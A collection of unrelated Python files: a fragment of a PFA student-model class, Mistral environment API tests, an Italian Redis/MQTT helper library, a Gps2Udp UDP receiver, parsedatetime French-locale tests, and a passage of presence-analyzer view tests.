answers correctly.
:type gamma: float
:param delta: The significance of the update when the student
answers incorrectly.
:type delta: float
:param time_effect_good: Time effect function for correct answers.
:type time_effect_good: callable or string
:param time_effect_bad: Time effect function for wrong answers.
:type time_effect_bad: callable or string
"""
ABBR = 'PFA/G/T'
def __init__(self, *args, **kwargs):
kwargs.setdefault('gamma', 1) # these parameters should not be
kwargs.setdefault('delta', 1) # modified, i.e. kept equal to 1
time_effect_good = kwargs.pop('time_effect_good', 'pow')
time_effect_bad = kwargs.pop('time_effect_bad', 'pow')
if isinstance(time_effect_good, basestring):
self.a, self.c = kwargs.pop('a', None), kwargs.pop('c', None)
self.time_effect_good = init_time_effect(
self, time_effect_good, parameters=('a', 'c'))
else:
self.time_effect_good = time_effect_good
if isinstance(time_effect_bad, basestring):
self.b, self.d = kwargs.pop('b', None), kwargs.pop('d', None)
self.time_effect_bad = init_time_effect(
self, time_effect_bad, parameters=('b', 'd'))
else:
self.time_effect_bad = time_effect_bad
super(PFAGong, self).__init__(*args, **kwargs)
def get_weights(self, item, question):
"""Returns weights of previous answers to the given item.
:param item: *Item* (i.e. practiced place by a user).
:type item: :class:`Item`
:param question: Asked question.
:type question: :class:`pandas.Series` or :class:`Question`
"""
correct_weights = [
ans.is_correct * self.time_effect_good(diff) for ans, diff
in izip(item.practices, item.get_diffs(question.inserted))
]
incorrect_weights = [
(1 - ans.is_correct) * self.time_effect_bad(diff) for ans, diff
in izip(item.practices, item.get_diffs(question.inserted))
]
return sum(correct_weights), sum(incorrect_weights)
|
# Copyright 2015 - StackStorm, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import datetime
import json
import mock
import six
import sqlalchemy as sa
from mistral.api.controllers.v2 import resources
from mistral.db.v2 import api as db_api
from mistral.db.v2.sqlalchemy import models as db
from mistral import exceptions as exc
from mistral.tests.unit.api import base
from oslo_utils import uuidutils
DATETIME_FORMAT = '%Y-%m-%d %H:%M:%S.%f'
VARIABLES = {
'host': 'localhost',
'db': 'test',
'timeout': 600,
'verbose': True,
'__actions': {
'std.sql': {
'conn': 'mysql://admin:secret@<% env().host %>/<% env().db %>'
}
}
}
ENVIRONMENT_FOR_CREATE = {
'name': 'test',
'description': 'my test settings',
'variables': VARIABLES,
}
ENVIRONMENT_FOR_UPDATE = {
'name': 'test',
'description': 'my test settings',
'variables': VARIABLES,
'scope': 'private'
}
ENVIRONMENT_FOR_UPDATE_NO_SCOPE = {
'name': 'test',
'description': 'my test settings',
'variables': VARIABLES
}
ENVIRONMENT = {
'id': uuidutils.generate_uuid(),
'name': 'test',
'description': 'my test settings',
'variables': VARIABLES,
'scope': 'private',
'project_id': '<default-project>',
'created_at': str(datetime.datetime.utcnow()),
'updated_at': str(datetime.datetime.utcnow())
}
ENVIRONMENT_WITH_ILLEGAL_FIELD = {
'id': uuidutils.generate_uuid(),
'name': 'test',
'description': 'my test settings',
'extra_field': 'I can add whatever I want here',
'variables': VARIABLES,
'scope': 'private',
}
ENVIRONMENT_DB = db.Environment(
id=ENVIRONMENT['id'],
name=ENVIRONMENT['name'],
description=ENVIRONMENT['description'],
variables=copy.deepcopy(VARIABLES),
scope=ENVIRONMENT['scope'],
project_id=ENVIRONMENT['project_id'],
created_at=datetime.datetime.strptime(ENVIRONMENT['created_at'],
DATETIME_FORMAT),
updated_at=datetime.datetime.strptime(ENVIRONMENT['updated_at'],
DATETIME_FORMAT)
)
ENVIRONMENT_DB_WITH_PROJECT_ID = ENVIRONMENT_DB.get_clone()
ENVIRONMENT_DB_WITH_PROJECT_ID.project_id = '<default-project>'
ENVIRONMENT_DB_DICT = {k: v for k, v in ENVIRONMENT_DB.items()}
UPDATED_VARIABLES = copy.deepcopy(VARIABLES)
UPDATED_VARIABLES['host'] = '127.0.0.1'
FOR_UPDATED_ENVIRONMENT = copy.deepcopy(ENVIRONMENT_FOR_UPDATE)
FOR_UPDATED_ENVIRONMENT['variables'] = json.dumps(UPDATED_VARIABLES)
UPDATED_ENVIRONMENT = copy.deepcopy(ENVIRONMENT)
UPDATED_ENVIRONMENT['variables'] = json.dumps(UPDATED_VARIABLES)
UPDATED_ENVIRONMENT_DB = db.Environment(**ENVIRONMENT_DB_DICT)
UPDATED_ENVIRONMENT_DB.variables = copy.deepcopy(UPDATED_VARIABLES)
MOCK_ENVIRONMENT = mock.MagicMock(return_value=ENVIRONMENT_DB)
MOCK_ENVIRONMENTS = mock.MagicMock(return_value=[ENVIRONMENT_DB])
MOCK_UPDATED_ENVIRONMENT = mock.MagicMock(return_value=UPDATED_ENVIRONMENT_DB)
MOCK_EMPTY = mock.MagicMock(return_value=[])
MOCK_NOT_FOUND = mock.MagicMock(side_effect=exc.DBEntityNotFoundError())
MOCK_DUPLICATE = mock.MagicMock(side_effect=exc.DBDuplicateEntryError())
MOCK_DELETE = mock.MagicMock(return_value=None)
def _convert_vars_to_dict(env_dict):
"""Converts 'variables' in the given environment dict into dictionary."""
if ('variables' in env_dict and
isinstance(env_dict.get('variables'), six.string_types)):
env_dict['variables'] = json.loads(env_dict['variables'])
return env_dict
def _convert_vars_to_json(env_dict):
"""Converts 'variables' in the given environment dict into string."""
if ('variables' in env_dict and
isinstance(env_dict.get('variables'), dict)):
env_dict['variables'] = json.dumps(env_dict['variables'])
return env_dict
class TestEnvironmentController(base.APITest):
def _assert_dict_equal(self, expected, actual):
self.assertIsInstance(expected, dict)
self.assertIsInstance(actual, dict)
_convert_vars_to_dict(expected)
_convert_vars_to_dict(actual)
self.assertDictEqual(expected, actual)
def test_resource(self):
resource = resources.Environment(**copy.deepcopy(ENVIRONMENT))
self._assert_dict_equal(
copy.deepcopy(ENVIRONMENT),
resource.to_dict()
)
@mock.patch.object(db_api, 'get_environments', MOCK_ENVIRONMENTS)
def test_get_all(self):
resp = self.app.get('/v2/environments')
self.assertEqual(200, resp.status_int)
self.assertEqual(1, len(resp.json['environments']))
@mock.patch.object(db_api, 'get_environments')
def test_get_all_operational_error(self, mocked_get_all):
mocked_get_all.side_effect = [
# Emulating DB OperationalError
sa.exc.OperationalError('Mock', 'mock', 'mock'),
[ENVIRONMENT_DB] # Successful run
]
resp = self.app.get('/v2/environments')
self.assertEqual(200, resp.status_int)
self.assertEqual(1, len(resp.json['environments']))
self._assert_dict_equal(ENVIRONMENT, resp.json['environments'][0])
def test_get_all_empty(self):
resp = self.app.get('/v2/environments')
self.assertEqual(200, resp.status_int)
self.assertEqual(0, len(resp.json['environments']))
@mock.patch.object(db_api, 'get_environment', MOCK_ENVIRONMENT)
def test_get(self):
resp = self.app.get('/v2/environments/123')
self.assertEqual(200, resp.status_int)
self._assert_dict_equal(ENVIRONMENT, resp.json)
@mock.patch.object(db_api, 'get_environment')
def test_get_operational_error(self, mocked_get):
mocked_get.side_effect = [
# Emulating DB OperationalError
sa.exc.OperationalError('Mock', 'mock', 'mock'),
ENVIRONMENT_DB # Successful run
]
resp = self.app.get('/v2/environments/123')
self.assertEqual(200, resp.status_int)
self._assert_dict_equal(ENVIRONMENT, resp.json)
@mock.patch.object(db_api, 'get_environment',
return_value=ENVIRONMENT_DB_WITH_PROJECT_ID)
def test_get_within_project_id(self, mock_get):
resp = self.app.get('/v2/environments/123')
self.assertEqual(200, resp.status_int)
self.assertEqual('<default-project>', resp.json['project_id'])
@mock.patch.object(db_api, "get_environment", MOCK_NOT_FOUND)
def test_get_not_found(self):
resp = self.app.get('/v2/environments/123', expect_errors=True)
self.assertEqual(404, resp.status_int)
@mock.patch.object(db_api, 'create_environment', MOCK_ENVIRONMENT)
def test_post(self):
resp = self.app.post_json(
'/v2/environments',
_convert_vars_to_json(copy.deepcopy(ENVIRONMENT_FOR_CREATE))
)
self.assertEqual(201, resp.status_int)
self._assert_dict_equal(copy.deepcopy(ENVIRONMENT), resp.json)
@mock.patch.object(db_api, 'create_environment', MOCK_ENVIRONMENT)
def test_post_with_illegal_field(self):
resp = self.app.post_json(
'/v2/environments',
_convert_vars_to_json(
copy.deepcopy(ENVIRONMENT_WITH_ILLEGAL_FIELD)),
expect_errors=True
)
self.assertEqual(400, resp.status_int)
@mock.patch.object(db_api, 'create_environment', MOCK_DUPLICATE)
def test_post_dup(self):
resp = self.app.post_json(
'/v2/environments',
_convert_vars_to_json(copy.deepcopy(ENVIRONMENT_FOR_CREATE)),
expect_errors=True
)
self.assertEqual(409, resp.status_int)
@mock.patch.object(db_api, 'create_environment', MOCK_ENVIRONMENT)
def test_post_default_scope(self):
env = _convert_vars_to_json(copy.deepcopy(ENVIRONMENT_FOR_CREATE))
resp = self.app.post_json('/v2/environments', env)
self.assertEqual(201, resp.status_int)
self._assert_dict_equal(copy.deepcopy(ENVIRONMENT), resp.json)
@mock.patch.object(db_api, 'update_environment', MOCK_UPDATED_ENVIRONMENT)
def test_put(self):
resp = self.app.put_json(
'/v2/environments',
copy.deepcopy(FOR_UPDATED_ENVIRONMENT)
)
self.assertEqual(200, resp.status_int)
self._assert_dict_equal(UPDATED_ENVIRONMENT, resp.json)
@mock.patch.object(db_api, 'update_environment', MOCK_UPDATED_ENVIRONMENT)
def test_put_default_scope(self):
env = copy.deepcopy(ENVIRONMENT_FOR_UPDATE_NO_SCOPE)
env['variables'] = json.dumps(env)
resp = self.app.put_json('/v2/environments', env)
self.assertEqual(200, resp.status_int)
self._assert_dict_equal(copy.deepcopy(UPDATED_ENVIRONMENT), resp.json)
@mock.patch.object(db_api, 'update_environment', MOCK_NOT_FOUND)
def test_put_not_found(self):
env = copy.deepcopy(FOR_UPDATED_ENVIRONMENT)
resp = self.app.put_json(
'/v2/environments',
env,
expect_errors=True
)
self.assertEqual(404, resp.status_int)
@mock.patch.object(db_api, 'delete_environment', MOCK_DELETE)
def test_delete(self):
resp = self.app.delete('/v2/environments/123')
self.assertEqual(204, resp.status_int)
@mock.patch.object(db_api, 'delete_environment', MOCK_NOT_FOUND)
def test_delete_not_found(self):
resp = self.app.delete('/v2/environments/123', expect_errors=True)
self.assertEqual(404, resp.status_int)
|
#!/usr/bin/env python3
"""
Function Library T w/ Redis
Libreria
Funzioni
T
Conterra` funzioni specifiche, ma anche quelle generali,
per ora ho separato quelle della gestione json file e pagine html,
tutte le altre funzioni pensavo di metterle qua.
Appunto: pensavo .. e invece ..
Aggiornamenti: Sat 19 Mar 2016 08:30:53 AM CET
Aggiornamento: Sun 09 Oct 2016 10:33:55 AM CEST
"""
import redis,os,socket,time
# La mia libreria Json
import mjl
# MQTT (copio dall'esempio)
import sys
try:
import paho.mqtt.publish as publish
except ImportError:
# This part is only required to run the example from within the examples
# directory when the module itself is not installed.
#
# If you have the module installed, just use "import paho.mqtt.publish"
import os
import inspect
cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"../src")))
if cmd_subfolder not in sys.path:
sys.path.insert(0, cmd_subfolder)
import paho.mqtt.publish as publish
# Ho forse personalizzato troppo questa libreria/funzione,
# Purtroppo credo che la utilizzero` spesso, e mantenere il file di configurazione
# staccato sarebbe costato troppo.
def OpenDBFile(ConfigFile):
# Leggo il file di configurazione
ConfigNow=mjl.ReadJsonFile(ConfigFile)
for i in range(len(ConfigNow)):
if "redis" == ConfigNow[i]["name"]:
ConfigNow = ConfigNow[i]["value"]
DB = redis.StrictRedis(host=mjl.SearchValueJsonVar(ConfigNow,"hostname"), port=mjl.SearchValueJsonVar(ConfigNow,"port"), db=mjl.SearchValueJsonVar(ConfigNow,"db"), password=mjl.SearchValueJsonVar(ConfigNow,"password"))
return DB
# Apre un database Redis con parametri
def OpenDB(Host,Port,Database,Password):
DB = redis.StrictRedis(host=Host, port=Port, db=Database, password=Password)
return DB
# Faccio una funzione per la decodifica bytes -> str
def Decode(TxT):
return TxT.decode('unicode_escape')
# Decodifica una lista
def DecodeList(List):
return [x.decode('unicode_escape') for x in List]
# Controlla se esiste un "field" di una "key" tipo "hash"
# e restituisce il contenuto, altrimenti restituisce 'none'
def CheckKeyHashField(DB,Hash,Field):
FieldValue="none"
if DB.hexists(Hash,Field):
FieldValue=DB.hget(Hash,Field)
return FieldValue
# Apre/legge un file e restituisce il contenuto
def ReadFile(Filename):
if os.path.exists(Filename):
FileTemp = open(Filename,"r")
DataFile = FileTemp.read()
FileTemp.close()
return DataFile
else:
print ("Errore, manca il file", Filename)
#exit()
return "errore"
# Scrive un file
def WriteFileData(Filename,Dato):
if not os.path.exists(Filename):
FileTemp = open(Filename,"w")
FileTemp.write(Dato)
FileTemp.close()
else:
# Funzionano entrambe
print ("Errore, il file \"{}\" esiste gia`!".format(Filename))
#print ("Errore, il file \"%s\" esiste gia`!" % Filename)
exit()
# Aggiunge dati ad un file, aprendolo e richiudendolo
def AddFileData(Filename,Dato):
if os.path.exists(Filename):
FileTemp = open(Filename,"a")
FileTemp.write(Dato)
FileTemp.close()
else:
print ("Errore, manca il file", Filename)
exit()
# Controlla una connessione di rete
def NetCheck(Hostname,Port):
s = socket.socket()
try:
s.connect((Hostname,Port))
except socket.error as msg:
print("Non ho trovato/non mi collego a %s:%d.\nIl messaggio d\'errore e`: %s" % (Hostname, Port, msg))
return False
else:
return True
## Funzione invio avvisi al database (Redis) server dei messaggi
## E` presa da thermo, ma siccome qua e` uguale ... (ho deciso di metterla in libreria)
# database,messaggio,tipo,descrizione,valore,unita`dimisura,data
# DB,msg:{pc}:{id}:<data&ora>,<alert/alarm>,Descrizione,Valore,Unita` di misura,Data
def InviaAvviso(DB,MsgID,Type,Desc,Value,UM,Date):
Hostname=Decode(DB.hget("redis:server:message","hostname"))
Port=Decode(DB.hget("redis:server:message","port"))
Database=Decode(DB.hget("redis:server:message","database"))
Password=Decode(DB.hget("redis:server:message","password"))
if NetCheck(Hostname,int(Port)):
MyMsgDB = OpenDB(Hostname,Port,Database,Password)
MyMsgDB.hmset(MsgID, {"type": Type, "desc": Desc, "value": Value, "um": UM, "date": Date})
else:
print ("Non posso inviare l\'avviso a \"%s:%d\".\n" % (Hostname,Port))
# Aiuto personalizzazione dei messagi di avviso per risparmiare qualche digitazione
# Data+ora [0], Data [1]
def AlertsID():
MsgIDate=time.strftime("%Y%m%d%H%M%S",time.localtime())
#MsgType="alert"
MsgDate=time.strftime("%Y/%m/%d %H:%M:%S",time.localtime())
return MsgIDate,MsgDate
## Funzione invio dati al broker MQTT (Mosquitto)
# Questa e` la definizione nella libreria paho-mqtt:
# def single(topic, payload=None, qos=0, retain=False, hostname="localhost",
# port=1883, client_id="", keepalive=60, will=None, auth=None,
# tls=None, protocol=paho.MQTTv311, transport="tcp"):
# Questa sarebbe la riga completa, al momento uso solo il topic ed il messaggio,
# il resto e` preso dalla configurazione inserita in redis:
#def InviaMqttData(Topic,Payload,QOS,Retain,Hostname,Port,CleintID,Keepalive,Will,Auth,TLS,Protocol,Transport):
# C'e` un problema, la definzione l'ho presa dalla "level1", dove DB era definito, qua, glielo devo passare !!!
def InviaMqttData(DB,Topic,Payload):
Hostname=Decode(DB.hget("mqttbroker:server:message","hostname"))
Port=int(Decode(DB.hget("mqttbroker:server:message","port")))
User=Decode(DB.hget("mqttbroker:server:message","user"))
Password=Decode(DB.hget("mqttbroker:server:message","password"))
if User == "" or Password == "":
Auth= {'username':'none', 'password':'none'}
else:
Auth= { 'username' : User , 'password' : Password } # Questa e` da verificare ***
if NetCheck(Hostname,Port):
publish.single(Topic, Payload, hostname=Hostname, port=Port, auth=Auth)
else:
print ("Non posso trasmettere a \"%s:%s\".\n" % (Hostname,Port))
|
#!/usr/bin/env python
"""
Receive Geo location data from the Gps2Udp Android application
via UDP/IP and forward them to the stdout line by line.
There is some requirements to a valid incoming packet:
- it must be of form: TIMESTAMP LATITUDE LONGITUDE ACCURACY [other fields];
- TIMESTAMP is a Unix timestamp (seconds since 1 Jan 1970);
- the diff between TIMESTAMP and local time must be less
than MAX_TIME_DIFF (definition of the MAX_TIME_DIFF variable see below);
- TIMESTAMP must be greater than timestamp of a previous valid packet;
- LATITUDE is a float between [-90.0..90.0];
- LONGITUDE is a float between [-180.0..180.0];
- ACCURACY is an integer between [0..MAX_ACCURACY] (definition of
MAX_ACCURACY variable see below).
If any of the requirements are not met, the packet will be silently ignored.
When started with --signed command line option, an extra field must
be defined in each incoming UDP packet - DIGEST. With the field common
packet format must be of form:
TIMESTAMP LATITUDE LONGITUDE ACCURACY DIGEST
DIGEST - is a SHA1 from "TIMESTAMP LATITUDE LONGITUDE ACCURACY" + secret
string known only by Gps2Udp client (Android app) and the server. The
server reads the secret from GPS2UDP_SECRET environment variable.
Important notes. When in --signed mode:
- any packet without the digest will be ignored;
- any packet with digest not matched with digest calculated on the
server side, will be ignored;
- if the secret is not defined (GPS2UDP_SECRET environment variable is not
set or empty), no packets will be matched as valid.
"""
import getopt
import hashlib
import os
import os.path
import socket
import sys
import time
DEFAULT_PORT = 5000
# Maximum time difference between a timestamp in a packet and
# the local Unix timestamp (in seconds).
MAX_TIME_DIFF = 60 * 5
# Maximum valid accuracy value (in meters).
MAX_ACCURACY = 10000 # 10km
# Here will be stored the timestamp of the last valid packet received.
# The timestamp will be used later to avoid receiving data from the past.
LAST_TIMESTAMP = None
def usage(exitcode = 1):
"""
Show usage info and exit.
"""
argv0 = os.path.basename(sys.argv[0])
print 'Usage: {0} [options]'.format(argv0)
print ' Options:'
print ' --signed check every UDP packet for digital signature;'
print ' --port=N UDP port number to listen. Default is 5000.'
sys.exit(exitcode)
def main():
"""
Entry point.
"""
try:
cmd_opts, _cmd_args = getopt.getopt(
sys.argv[1:], '', ['port=', 'signed'])
except getopt.GetoptError as exc:
sys.stderr.write('Error: ' + str(exc) + '\n')
usage()
cmd_opts = dict(cmd_opts)
port = int(cmd_opts.get('--port', str(DEFAULT_PORT)))
signed = '--signed' in cmd_opts
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', port))
while True:
data, _addr = sock.recvfrom(100)
try:
result = parse_packet(data, signed)
except PacketParseError:
continue
sys.stdout.write(format_packet(result))
sys.stdout.flush()
class PacketParseError(Exception):
"""Bad packet received."""
pass
def parse_packet(data, signed = False):
"""
Parse and check incoming packet.
The packet must be of form:
TIMESTAMP LATITUDE LONGITUDE ACCURACY
:param data: packet body
:type data: string
:param signed: if True, the packet will be checked for a
valid digital signature
:type signed: boolean
:rtype: dict
"""
global LAST_TIMESTAMP
result = {}
tokens = [elem for elem in data.strip().split(' ') if elem]
if signed:
# check the signature
if len(tokens) < 5:
raise PacketParseError
payload = ' '.join(tokens[:4])
digest = tokens[4]
secret = os.environ.get('GPS2UDP_SECRET')
if secret is None or len(secret) == 0:
# secret is not defined => unable to check
raise PacketParseError
hasher = hashlib.sha1()
hasher.update(payload + secret)
if hasher.hexdigest() != digest:
# digital signature mismatch
raise PacketParseError
else:
# check tokens count
if len(tokens) < 4:
raise PacketParseError
# parse the tokens
try:
result['timestamp'] = int(tokens[0])
result['latitude'] = float(tokens[1])
result['longitude'] = float(tokens[2])
result['accuracy'] = int(tokens[3])
except ValueError:
raise PacketParseError
# check timestamp
time_diff = abs(result['timestamp'] - int(time.time()))
if time_diff > MAX_TIME_DIFF:
# the timestamp differs from NOW for more than 5 minutes
raise PacketParseError
if LAST_TIMESTAMP is not None:
if result['timestamp'] <= LAST_TIMESTAMP:
# the timestamp is not greater than the previous timestamp
raise PacketParseError
# check lat&long values
if not (-90.0 <= result['latitude'] <= 90.0):
raise PacketParseError
if not (-180.0 <= result['longitude'] <= 180.0):
raise PacketParseError
# check accuracy value
if result['accuracy'] < 0 or result['accuracy'] > MAX_ACCURACY:
raise PacketParseError
# All checks is passed => packet is valid.
# Save the timestamp in global var:
LAST_TIMESTAMP = result['timestamp']
return result
def format_packet(data):
"""
Format received packet for the stdout.
:param data: packet data
:type data: dict
:rtype: string
"""
return (str(data['timestamp']) + ' ' +
format(data['latitude'], '.7f') + ' ' +
format(data['longitude'], '.7f') + ' ' +
str(data['accuracy']) + '\n')
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
sys.exit(1)
|
#!/usr/bin/env python
"""
Test parsing of simple date and times using the French locale
Note: requires PyICU
"""
import unittest, time, datetime
import parsedatetime.parsedatetime as pt
import parsedatetime.parsedatetime_consts as ptc
# a special compare function is used to allow us to ignore the seconds as
# the running of the test could cross a minute boundary
def _compareResults(result, check):
target, t_flag = result
value, v_flag = check
t_yr, t_mth, t_dy, t_hr, t_min, _, _, _, _ = target
v_yr, v_mth, v_dy, v_hr, v_min, _, _, _, _ = value
return ((t_yr == v_yr) and (t_mth == v_mth) and (t_dy == v_dy) and
(t_hr == v_hr) and (t_min == v_min)) and (t_flag == v_flag)
class test(unittest.TestCase):
def setUp(self):
self.ptc = ptc.Constants('fr_FR', usePyICU=True)
self.cal = pt.Calendar(self.ptc)
self.yr, self.mth, self.dy, self.hr, self.mn, self.sec, self.wd, self.yd, self.isdst = time.localtime()
def testTimes(self):
if self.ptc.localeID == 'fr_FR':
start = datetime.datetime(self.yr, self.mth, self.dy, self.hr, self.mn, self.sec).timetuple()
target = datetime.datetime(self.yr, self.mth, self.dy, 23, 0, 0).timetuple()
self.assertTrue(_compareResults(self.cal.parse('2300', start), (target, 2)))
self.assertTrue(_compareResults(self.cal.parse('23:00', start), (target, 2)))
target = datetime.datetime(self.yr, self.mth, self.dy, 11, 0, 0).timetuple()
self.assertTrue(_compareResults(self.cal.parse('1100', start), (target, 2)))
self.assertTrue(_compareResults(self.cal.parse('11:00', start), (target, 2)))
target = datetime.datetime(self.yr, self.mth, self.dy, 7, 30, 0).timetuple()
self.assertTrue(_compareResults(self.cal.parse('730', start), (target, 2)))
self.assertTrue(_compareResults(self.cal.parse('0730', start), (target, 2)))
target = datetime.datetime(self.yr, self.mth, self.dy, 17, 30, 0).timetuple()
self.assertTrue(_compareResults(self.cal.parse('1730', start), (target, 2)))
self.assertTrue(_compareResults(self.cal.parse('173000', start), (target, 2)))
def testDates(self):
if self.ptc.localeID == 'fr_FR':
start = datetime.datetime(self.yr, self.mth, self.dy, self.hr, self.mn, self.sec).timetuple()
target = datetime.datetime(2006, 8, 25, self.hr, self.mn, self.sec).timetuple()
self.assertTrue(_compareResults(self.cal.parse('25/08/2006', start), (target, 1)))
self.assertTrue(_compareResults(self.cal.parse('25/8/06', start), (target, 1)))
self.assertTrue(_compareResults(self.cal.parse(u'ao\xfbt 25, 2006', start), (target, 1)))
self.assertTrue(_compareResults(self.cal.parse(u'ao\xfbt 25 2006', start), (target, 1)))
if self.mth > 8 or (self.mth == 8 and self.dy > 25):
target = datetime.datetime(self.yr+1, 8, 25, self.hr, self.mn, self.sec).timetuple()
else:
target = datetime.datetime(self.yr, 8, 25, self.hr, self.mn, self.sec).timetuple()
self.assertTrue(_compareResults(self.cal.parse('25/8', start), (target, 1)))
self.assertTrue(_compareResults(self.cal.parse('25/08', start), (target, 1)))
def testWeekDays(self):
if self.ptc.localeID == 'fr_FR':
start = datetime.datetime(self.yr, self.mth, self.dy, self.hr, self.mn, self.sec).timetuple()
o1 = self.ptc.CurrentDOWParseStyle
o2 = self.ptc.DOWParseStyle
# set it up so the current dow returns current day
self.ptc.CurrentDOWParseStyle = True
self.ptc.DOWParseStyle = 1
for i in range(0,7):
dow = self.ptc.shortWeekdays[i]
result = self.cal.parse(dow, start)
yr, mth, dy, hr, mn, sec, wd, yd, isdst = result[0]
self.assertTrue(wd == i)
self.ptc.CurrentDOWParseStyle = o1
self.ptc.DOWParseStyle = o2
if __name__ == "__main__":
unittest.main()
|
# -*- coding: utf-8 -*-
"""
Presence analyzer unit tests.
"""
import os.path
import json
import datetime
import unittest
from mock import patch
from random import randint
from presence_analyzer import main, views, utils, decorators, helpers
CURRENT_PATH = os.path.dirname(__file__)
TEST_DATA_CSV = os.path.join(
CURRENT_PATH, '..', '..', 'runtime', 'data', 'test_data.csv'
)
BAD_TEST_DATA_CSV = os.path.join(
CURRENT_PATH, '..', '..', 'runtime', 'data', 'bad_test_data.csv'
)
TEST_DATA_XML = os.path.join(
CURRENT_PATH, '..', '..', 'runtime', 'data', 'test_users.xml'
)
BAD_TEST_DATA_XML = os.path.join(
CURRENT_PATH, '..', '..', 'runtime', 'data', 'bad_test_users.xml'
)
VALID_HTML_MIME = ('text/html', 'text/html; charset=utf-8')
# pylint: disable=E1103
class PresenceAnalyzerViewsTestCase(unittest.TestCase):
"""
Views tests.
"""
def setUp(self):
"""
Before each test, set up a environment.
"""
main.app.config.update({'DATA_CSV': TEST_DATA_CSV})
main.app.config.update({'DATA_XML': TEST_DATA_XML})
self.client = main.app.test_client()
def tearDown(self):
"""
Get rid of unused objects after each test.
"""
pass
def test_mainpage(self):
"""
Test main page redirect.
"""
resp = self.client.get('/')
self.assertEqual(resp.status_code, 302)
assert resp.headers['Location'].endswith('/presence_weekday.html')
def test_api_users(self):
"""
Test users listing.
"""
resp = self.client.get('/api/v1/users')
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.content_type, 'application/json')
data = json.loads(resp.data)
self.assertEqual(len(data), 9)
self.assertDictEqual(
data[0],
{u'avatar': u'https://intranet.stxnext.pl:443/api/images/users/36',
u'name': u'Anna W.', u'user_id': 36}
)
def test_presence_start_end_view(self):
"""
Test user presence start-end view
"""
url = '/api/v1/presence_start_end/%d'
user_id = 11
resp = self.client.get(url % user_id)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.content_type, 'application/json')
data = json.loads(resp.data)
self.assertEqual(len(data), 5)
self.assertEqual(len(data[0]), 3)
self.assertTrue('Mon' in data[0])
@patch.object(views.log, 'debug')
def test_presence_start_end_view_log(self, mock_logger):
"""
Test user presence start-end view for non-existing user
"""
url = '/api/v1/presence_start_end/%d'
user_id = 112312
resp = self.client.get(url % user_id)
mock_logger.assert_called_once_with('User %s not found!', user_id)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.content_type, 'application/json')
def test_mean_time_weekday_view(self):
"""
Test daily mean time for user
"""
base_url = '/api/v1/mean_time_weekday/%d'
resp = self.client.get(base_url % 10)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.content_type, 'application/json')
data = json.loads(resp.data)
self.assertEqual(len(data), 7)
self.assertListEqual(data[1], [u'Tue', 30047.0])
self.assertListEqual(data[6], [u'Sun', 0])
resp = self.client.get(base_url % 11)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.content_type, 'application/json')
data = json.loads(resp.data)
self.assertEqual(len(data), 7)
self.assertListEqual(data[2], [u'Wed', 25321.0])
self.assertListEqual(data[6], [u'Sun', 0])
@patch.object(views.log, 'debug')
def test_mean_time_weekday_view_log(self, mock_logger):
"""
Checks if log.debug is called when requesting for non-existing user
"""
user_id = 31111111111111111
resp = self.client.get('/api/v1/mean_time_weekday/%d' % user_id)
mock_logger.assert_called_once_with('User %s not found!', user_id)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.content_type, 'application/json')
data = json.loads(resp.data)
self.assertEqual(data, [])
def test_get_start_end_mean_time(self):
"""
Test calculating start-end mean time
"""
users_data = utils.get_data()
user_mean_time_10 = utils.get_start_end_mean_time(users_data[10])
user_mean_time_11 = utils.get_start_end_mean_time(users_data[11])
self.assertEqual(len(user_mean_time_10), 3)
self.assertEqual(len(user_mean_time_11), 5)
self.assertIsInstance(user_mean_time_11[0], tuple)
self.assertIsInstance(user_mean_time_11[4], tuple)
self.assertIsInstance(user_mean_time_10[2], tuple)
self.assertIsInstance(user_mean_time_11[2][0], str)
self.assertIsInstance(user_mean_time_11[3][1], int)
self.assertIsInstance(user_mean_time_11[1][2], int)
# time value is in milliseconds
for row in user_mean_time_10:
self.assertTrue(0 <= row[1] < 24*60*60*1000,
msg="User#10, row data: %s" % str(row))
self.assertTrue(0 <= row[2] < 24*60*60*1000,
msg="User#10, row data: %s" % str(row))
for row in user_mean_time_11:
self.assertTrue(0 <= row[1] < 24*60*60*1000,
msg="User#11, row data: %s" % str(row))
self.assertTrue(0 <= row[2] < 24*60*60*1000,
msg="User#11, row data: %s" % str(row))
self.assertEqual(user_mean_time_10[1][0], "Wed")
self.assertEqual(user_mean_time_10[0][1], 34745000)
self.assertEqual(user_mean_time_10[1][2], 58057000)
self.assertEqual(user_mean_time_11[1][1], 33590000)
self.assertEqual(user_mean_time_11[1][2], 50154000)
self.assertEqual(user_mean_time_11[3][1], 35602000)
self.assertEqual(user_mean_time_11[4][2], 54242000)
def test_presence_weekday_view(self):
"""
Test daily user presence
"""
base_url = '/api/v1/presence_weekday/%d'
resp = self.client.get(base_url % 10)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.content_type, 'application/json')
data = json.loads(resp.data)
self.assertEqual(len(data), 8)
self.assertListEqual(data[0], [u'Weekday', u'Presence (s)'])
self.assertListEqual(data[2], [u'Tue', 30047.0])
self.assertListEqual(data[6], [u'Sat', 0])
resp = self.client.get(base_url % 11)
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.content_type, 'application/json')
data = json.loads(resp.data)
self.assertEqual(len(data), 8)
self.assertListEqual(data[0], [u'Weekday', u'Presence (s)'])
self.assertListEqual(data[4], [u'Thu', 45968])
self.assertListEqual(data[6], [u'Sat', 0])
@patch.object(views.log, 'debug')
def test_presence_weekday_view_log(self, mock_logger):
"""
Test daily user presence for non-existing user
"""
user_id = 31111111111111111
resp = self.client.get('/api/v1/presence_weekday/%d' % user_id)
mock_logger.assert_called_once_with('User %s not found!', user_id)
self.assertEqual(resp.status_code, 200)
